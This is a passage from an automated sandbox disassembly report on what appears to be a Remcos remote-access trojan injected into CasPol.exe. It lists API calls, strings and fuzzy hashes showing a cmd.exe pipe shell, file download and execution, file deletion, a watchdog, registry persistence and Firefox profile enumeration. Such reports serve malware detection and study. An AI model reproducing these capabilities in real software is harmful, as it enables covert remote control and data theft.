                                                                                                                      • Part of subcall function 00446B0F: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                    • HeapReAlloc.KERNEL32(00000000,?,00000000,?,0000000F,?,00431FE7,00000000,0000000F,0042EA4D,?,?,00430AB6,?,00000000), ref: 0044BA2B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Heap$AllocAllocate_free
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2447670028-0
                                                                                                                    • Opcode ID: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                                                    • Instruction ID: 4ec374b27fdcb4e51bf886fe72aa52163d481902fd3bbe85b5f84076fdb7f7cd
                                                                                                                    • Opcode Fuzzy Hash: d76ce5d9e4c682b15a99abc110236e8d1a2fbccdd24d1d48a07619e1950cdef4
                                                                                                                    • Instruction Fuzzy Hash: 0FF0C23260051166FB216E679C05F6B2B68DF827B0F15412BFD04B6291DF6CC80191ED
                                                                                                                    APIs
                                                                                                                    • socket.WS2_32(00000002,00000001,00000006), ref: 00404212
                                                                                                                      • Part of subcall function 00404262: WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                    • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404252
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateEventStartupsocket
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1953588214-0
                                                                                                                    • Opcode ID: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                    • Instruction ID: 6d5c4ce7eefecebe47fda3b025552a79fd8a61a73b62065855ea20d17e135052
                                                                                                                    • Opcode Fuzzy Hash: 854d00471859da485f7a9b00171063840124e4cdae7de36f8ad07afc2a8c10ec
                                                                                                                    • Instruction Fuzzy Hash: A20171B05087809ED7358F38B8456977FE0AB15314F044DAEF1D697BA1C3B5A481CB18
                                                                                                                    APIs
                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00433DF7
                                                                                                                      • Part of subcall function 00437BE7: RaiseException.KERNEL32(?,?,?,00433E19,00000000,00000000,?,?,?,?,?,?,00433E19,?,0046D5EC), ref: 00437C47
                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 00433E14
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Exception@8Throw$ExceptionRaise
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3476068407-0
                                                                                                                    • Opcode ID: 02f9a842f842a715d987613c720c18d86e9d620b05cc95bf3092e1ce2b61825f
                                                                                                                    • Instruction ID: a120e58b429b9861eb3006866c51ef53ea309f8249189fce9472b36b7df41f91
                                                                                                                    • Opcode Fuzzy Hash: 02f9a842f842a715d987613c720c18d86e9d620b05cc95bf3092e1ce2b61825f
                                                                                                                    • Instruction Fuzzy Hash: EFF0243080430D7BCB14BEAAE80799D772C5D08319F60612BB825955E1EF7CE715C58E
                                                                                                                    APIs
                                                                                                                    • GetForegroundWindow.USER32 ref: 0041AC84
                                                                                                                    • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041AC97
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$ForegroundText
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 29597999-0
                                                                                                                    • Opcode ID: fc9550f23c582834adc74fe767e5a47d1f70ec12f4b2fc4e7e19963045584285
                                                                                                                    • Instruction ID: cc2156d331005380bc7f387210694eb4be3f76427b44d354f8bc4e4bef854abe
                                                                                                                    • Opcode Fuzzy Hash: fc9550f23c582834adc74fe767e5a47d1f70ec12f4b2fc4e7e19963045584285
                                                                                                                    • Instruction Fuzzy Hash: CFE04875A0031867FB24A765AD4EFD6766C9704715F0000B9BA19E21C3E9B4EA04C7E4
                                                                                                                    APIs
                                                                                                                    • getaddrinfo.WS2_32(00000000,00000000,00000000,00471B28,00474358,00000000,00414240,00000000,00000001), ref: 00413FBC
                                                                                                                    • WSASetLastError.WS2_32(00000000), ref: 00413FC1
                                                                                                                      • Part of subcall function 00413E37: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00413E86
                                                                                                                      • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413EC8
                                                                                                                      • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413EE8
                                                                                                                      • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413EEF
                                                                                                                      • Part of subcall function 00413E37: LoadLibraryA.KERNEL32(?), ref: 00413F27
                                                                                                                      • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 00413F39
                                                                                                                      • Part of subcall function 00413E37: FreeLibrary.KERNEL32(00000000), ref: 00413F40
                                                                                                                      • Part of subcall function 00413E37: GetProcAddress.KERNEL32(00000000,?), ref: 00413F4F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Library$AddressProc$FreeLoad$DirectoryErrorLastSystemgetaddrinfo
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1170566393-0
                                                                                                                    • Opcode ID: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                                                                                                    • Instruction ID: 6b8e1b3bf706901e9cebb32ced8ad4f2671330a9e567d97b4cc2d1cd49d6d23a
                                                                                                                    • Opcode Fuzzy Hash: fe532004205893b42ca3e78fe98bfc0c037fcd8dad322742003ca3565627297f
                                                                                                                    • Instruction Fuzzy Hash: CED05B326406216FA310575D6D01FFBB5DCDFA67717110077F408D7110D6946D8283ED
                                                                                                                    APIs
                                                                                                                    • VirtualProtect.KERNEL32(?,00410B02,?,00000000,?,00000000,00000000,00410891), ref: 0041075D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: ProtectVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 544645111-0
                                                                                                                    • Opcode ID: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                    • Instruction ID: f15b865ef06e6e56f0e3155fe6c262580cd03049418ed3f125d30449dfe24c6e
                                                                                                                    • Opcode Fuzzy Hash: 1f5f5bcb50df5eab6b4ca8934853e6c5058cb0001586a28dc2c421d47bf62857
                                                                                                                    • Instruction Fuzzy Hash: 0B11CE72700101AFD6149A18C880BA6B766FF80710F5942AEE115CB292DBB5FCD2CA94
                                                                                                                    APIs
                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00433637,?,?,00402BE9,?,00402629,00000000,?,00402578,?,?), ref: 00446B41
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocateHeap
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1279760036-0
                                                                                                                    • Opcode ID: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                                    • Instruction ID: 9aef8a7b80d5ef8cde78cc1a95e43686bba12cbd10c6cd592e8946dff14ce016
                                                                                                                    • Opcode Fuzzy Hash: 9bddc84dc8664baa6f7cbd2250fb2f50dd1e52b915d866c7822d6cfd0d1e4f3c
                                                                                                                    • Instruction Fuzzy Hash: 54E0E5312012B5A7FB202A6A9C05F5B7688DB437A4F060033AC45D66D0CB58EC4181AF
                                                                                                                    APIs
                                                                                                                    • WSAStartup.WS2_32(00000202,00000000), ref: 00404277
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Startup
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 724789610-0
                                                                                                                    • Opcode ID: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                    • Instruction ID: eac2355bac846bce9fd0ddf676e945afe2a4b646382637a0be3cadb4b1fbcda1
                                                                                                                    • Opcode Fuzzy Hash: 95a2dab67d29c7ac03eac8c0eb79289a66407e1e5cc97b6f0f8b459783d59ee5
                                                                                                                    • Instruction Fuzzy Hash: E1D012325596084ED610AAB8AC0F8A47B5CD317611F0003BA6CB5826E3E640661CC6AB
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: recv
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1507349165-0
                                                                                                                    • Opcode ID: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                    • Instruction ID: fbcf0fb35859d26dd0bec2a34c6193cd90ff2e5205aa97c5c9b80f8ed11fde70
                                                                                                                    • Opcode Fuzzy Hash: 7e529be0125f3c130d8a14787ec60c5f2794d52df3155d2474e8bb3275198ed8
                                                                                                                    • Instruction Fuzzy Hash: 35B09279118202FFCA051B60DC0887ABEBAABCC381F108D2DB586501B0CA37C451AB26
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: send
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2809346765-0
                                                                                                                    • Opcode ID: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                    • Instruction ID: f30177ef1ac25d972003a71432bbdafa3536f6886768dd9ca1b11e7f0a6bf502
                                                                                                                    • Opcode Fuzzy Hash: 95a0fd16484bf767f6aff194c57c23075fd16a0a1a5a2095ebc589c6d407ffe4
                                                                                                                    • Instruction Fuzzy Hash: 4FB09279118302BFCA051B60DC0887A7EBAABC9381B108C2CB146512B0CA37C490EB36
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: Deallocate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1075933841-0
                                                                                                                    • Opcode ID: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                    • Instruction ID: a98dd8728e001a7547a03d6555be836c7c4d92c50a1b5b3c87ce8ff60de75990
                                                                                                                    • Opcode Fuzzy Hash: fa11f090124af29c98583f2c3e9d30177ae40f5e0afd44ce9742dc7edc058cff
                                                                                                                    • Instruction Fuzzy Hash: 69A0123300C2016AC9852E00DD05C0ABFA1EB90360F20C41FF086140F0CB32A0B0A705
                                                                                                                    APIs
                                                                                                                    • VirtualAlloc.KERNEL32(?,?,?,?,00410BFE,?,00000000,00003000,00000040,00000000,?,00000000), ref: 00410ACE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: AllocVirtual
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4275171209-0
                                                                                                                    • Opcode ID: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                    • Instruction ID: 38694f91ddd66904e98ee13f1febf2482794bae3131ffd3a876a6d6af10a8f86
                                                                                                                    • Opcode Fuzzy Hash: 9702951664480ae04aaa1f1f49bea02567c4bdffe4003b29d8b2a531ebe9342b
                                                                                                                    • Instruction Fuzzy Hash: 29B00832418382EFCF02DF90DD0492ABAA2BB88712F084C6CB2A14017187228428EB16
                                                                                                                    APIs
                                                                                                                    • SetEvent.KERNEL32(?), ref: 00406F28
                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,00000000,00000000), ref: 00406FF8
                                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00407018
                                                                                                                      • Part of subcall function 0041B43F: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B499
                                                                                                                      • Part of subcall function 0041B43F: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4CB
                                                                                                                      • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B51C
                                                                                                                      • Part of subcall function 0041B43F: FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B571
                                                                                                                      • Part of subcall function 0041B43F: RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B578
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                      • Part of subcall function 00406BE9: CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00465454,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C38
                                                                                                                      • Part of subcall function 00406BE9: WriteFile.KERNEL32(00000000,?,00000000,?,00000000,?,000186A0,?,?,?,00000000,00407273,00000000,?,0000000A,00000000), ref: 00406C80
                                                                                                                      • Part of subcall function 00406BE9: CloseHandle.KERNEL32(00000000,?,?,00000000,00407273,00000000,?,0000000A,00000000,00000000), ref: 00406CC0
                                                                                                                      • Part of subcall function 00406BE9: MoveFileW.KERNEL32(00000000,00000000), ref: 00406CDD
                                                                                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                      • Part of subcall function 00404468: WaitForSingleObject.KERNEL32(000002CC,00000000,LAL,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000), ref: 0040450E
                                                                                                                      • Part of subcall function 00404468: SetEvent.KERNEL32(000002CC,?,?,00000004,?,?,00000004,00473EE8,004745A8,00000000,?,?,?,?,?,00414CE9), ref: 0040453C
                                                                                                                    • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 00407416
                                                                                                                    • GetLogicalDriveStringsA.KERNEL32(00000064,?), ref: 004074F5
                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,?,00000000,00000001), ref: 0040773A
                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 004078CC
                                                                                                                      • Part of subcall function 00407A8C: __EH_prolog.LIBCMT ref: 00407A91
                                                                                                                      • Part of subcall function 00407A8C: FindFirstFileW.KERNEL32(00000000,?,00465AA0,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B4A
                                                                                                                      • Part of subcall function 00407A8C: FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00407B6E
                                                                                                                    • Sleep.KERNEL32(000007D0), ref: 00407976
                                                                                                                    • StrToIntA.SHLWAPI(00000000,00000000), ref: 004079BA
                                                                                                                      • Part of subcall function 0041BB87: SystemParametersInfoW.USER32(00000014,00000000,00000000,00000003), ref: 0041BC7C
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: File$Find$AttributesCloseDeleteDirectoryEventFirstNextRemove$CreateDriveExecuteH_prologHandleInfoLocalLogicalMoveObjectParametersShellSingleSleepStringsSystemTimeWaitWritesend
                                                                                                                    • String ID: Browsing directory: $Deleted file: $Downloaded file: $Downloading file: $Executing file: $Failed to download file: $H@G$Unable to delete: $Unable to rename file!$V>G$open$x@G$x@G$x@G$x@G$>G
                                                                                                                    • API String ID: 2918587301-599666313
                                                                                                                    • Opcode ID: 78de763cea10c2641bb49b821402416fcbe10fd49433a8ca9001545f10aee179
                                                                                                                    • Instruction ID: 1bc88c7e1bb4371a25effcd92402389f4e4e7f2dfcf0a55fa2f5aa785e242239
                                                                                                                    • Opcode Fuzzy Hash: 78de763cea10c2641bb49b821402416fcbe10fd49433a8ca9001545f10aee179
                                                                                                                    • Instruction Fuzzy Hash: CC42A372A043005BC604F776C8979AF76A59F90718F40493FF946771E2EE3CAA09C69B
                                                                                                                    APIs
                                                                                                                    • __Init_thread_footer.LIBCMT ref: 0040508E
                                                                                                                      • Part of subcall function 004334DF: EnterCriticalSection.KERNEL32(00470D18,00475D4C,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 004334E9
                                                                                                                      • Part of subcall function 004334DF: LeaveCriticalSection.KERNEL32(00470D18,?,0040AEAC,00475D4C,00456DA7,?,00000000,00000000), ref: 0043351C
                                                                                                                      • Part of subcall function 00404468: send.WS2_32(000002B8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                    • __Init_thread_footer.LIBCMT ref: 004050CB
                                                                                                                    • CreatePipe.KERNEL32(00475D0C,00475CF4,00475C18,00000000,0046556C,00000000), ref: 0040515E
                                                                                                                    • CreatePipe.KERNEL32(00475CF8,00475D14,00475C18,00000000), ref: 00405174
                                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00475C28,00475CFC), ref: 004051E7
                                                                                                                      • Part of subcall function 00433529: EnterCriticalSection.KERNEL32(00470D18,?,00475D4C,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433534
                                                                                                                      • Part of subcall function 00433529: LeaveCriticalSection.KERNEL32(00470D18,?,0040AE8B,00475D4C,?,00000000,00000000), ref: 00433571
                                                                                                                    • Sleep.KERNEL32(0000012C,00000093), ref: 0040523F
                                                                                                                    • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00405264
                                                                                                                    • ReadFile.KERNEL32(00000000,?,?,00000000), ref: 00405291
                                                                                                                      • Part of subcall function 004338B5: __onexit.LIBCMT ref: 004338BB
                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,?,00000000,00473F98,00465570,00000062,00465554), ref: 0040538E
                                                                                                                    • Sleep.KERNEL32(00000064,00000062,00465554), ref: 004053A8
                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 004053C1
                                                                                                                    • CloseHandle.KERNEL32 ref: 004053CD
                                                                                                                    • CloseHandle.KERNEL32 ref: 004053D5
                                                                                                                    • CloseHandle.KERNEL32 ref: 004053E7
                                                                                                                    • CloseHandle.KERNEL32 ref: 004053EF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCriticalHandleSection$CreatePipe$EnterFileInit_thread_footerLeaveProcessSleep$NamedPeekReadTerminateWrite__onexitsend
                                                                                                                    • String ID: (\G$SystemDrive$cmd.exe$p\G$p\G$p\G$p\G$p\G
                                                                                                                    • API String ID: 3815868655-1274243119
                                                                                                                    • Opcode ID: 2f13f051ee71259a3c174462a22be917dc54584fa79189f6e3402696e7dee425
                                                                                                                    • Instruction ID: e174317c0cfdf92f2f57875e471bcaa01af682fbbee25a17085fe39bc952a1f7
                                                                                                                    • Opcode Fuzzy Hash: 2f13f051ee71259a3c174462a22be917dc54584fa79189f6e3402696e7dee425
                                                                                                                    • Instruction Fuzzy Hash: 97910971504705AFD701BB25EC45A2F37A8EB84344F50443FF94ABA2E2DABC9D448B6E
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 00410F45
                                                                                                                      • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                      • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                      • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                    • OpenMutexA.KERNEL32(00100000,00000000,00000000), ref: 00410F81
                                                                                                                    • CreateThread.KERNEL32(00000000,00000000,00411637,00000000,00000000,00000000), ref: 00410FE6
                                                                                                                      • Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,?), ref: 004124D7
                                                                                                                      • Part of subcall function 004124B7: RegQueryValueExA.KERNEL32(?,?,00000000,00000000,00000000,?,004742F8), ref: 004124F5
                                                                                                                      • Part of subcall function 004124B7: RegCloseKey.KERNEL32(?), ref: 00412500
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00410F90
                                                                                                                      • Part of subcall function 0041A696: GetLocalTime.KERNEL32(00000000), ref: 0041A6B0
                                                                                                                    • OpenProcess.KERNEL32(001FFFFF,00000000,?), ref: 0041125A
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_10_2_400000_CasPol.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseOpen$CreateProcessValue$CurrentHandleLocalMutexQueryThreadTime
                                                                                                                    • String ID: 0DG$Remcos restarted by watchdog!$WDH$Watchdog launch failed!$Watchdog module activated$WinDir$\SysWOW64\$\system32\$fsutil.exe$rmclient.exe$svchost.exe$BG
                                                                                                                    • API String ID: 65172268-860466531
                                                                                                                    • Opcode ID: 1b06664216523bb5c8c2fc66387d896761bb74854a25fd9595ef5ff69de13416
                                                                                                                    • Instruction ID: cd90af3caa6d69ca3e9ea8718b5663318d6259183dea3b669bddfb6979e5fbe1
                                                                                                                    • Opcode Fuzzy Hash: 1b06664216523bb5c8c2fc66387d896761bb74854a25fd9595ef5ff69de13416
                                                                                                                    • Instruction Fuzzy Hash: 9F718E316042415BC614FB32D8579AE77A4AED4718F40053FF582A21F2EF7CAA49C69F
                                                                                                                    APIs
                                                                                                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040B3B4
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040B3CE
                                                                                                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040B4F1
                                                                                                                    • FindClose.KERNEL32(00000000), ref: 0040B517
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 0000000A.00000002.4494795969.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
